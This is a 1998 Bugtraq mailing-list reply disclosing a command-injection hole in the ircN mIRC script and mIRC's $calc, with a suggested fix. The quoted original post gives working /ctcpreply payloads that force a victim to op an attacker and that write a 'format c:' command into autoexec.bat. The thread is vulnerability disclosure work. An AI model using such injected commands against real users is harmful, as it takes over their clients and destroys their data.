Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Backdoor in ircN, popular mIRC script.

From: mox () SHELLZ NETREVOLUTION COM (Benoit Lefebvre)
Date: Thu, 23 Jul 1998 22:57:46 +0000

The bug is not only in ircN
It is in mIRC.

The problem is $calc(..)
ircN is just one of the script who use $calc to check the ping delay
eg: on 1:CTCPREPLY:PING*: { echo -a Ping reply: $calc($ctime - $2) }

To protect yourself, add that to your script
on 1:CTCPREPLY:PING*: { if ($2 !isnum) { halt } }

--

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
   ___/   ___/   _____/ __/   __/         Benoit Lefebvre
  ____/ ____/  __/  __/  __/__/                 MoxImages
  __/___/__/ ___/  ___/  ___/   @shellz.netrevolution.com
 __/ _/ __/  __/  __/  __/ __/      http://www.mox.qc.ca/
__/    __/   _____/  __/    __/               ICQ: 858084
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

On Thu, 23 Jul 1998, Nick Koscianski wrote:


A backdoor has been found in ircN, possibly the most popular mIRC
script.  Using the command /ctcpreply, any user can make someone using
the backdoored versions do whatever they want.  For example:
/ctcpreply Dianora ping $mode(#us-opers,+o,hax0r)
will force Dianora to give ops to hax0r in #us-opers.

also, they can be forced to run arbitrary programs, for example:

/ctcpreply Dianora $run(echo,"echo,y,|,format,c:\",>,c:\autoexec.bat)
will format this person's hard drive..definately not good.

A bug fix for this problem can be found at http://www.vode.org/ircN


-KKR
Previous By Date Next
Previous By Thread Next

Current thread: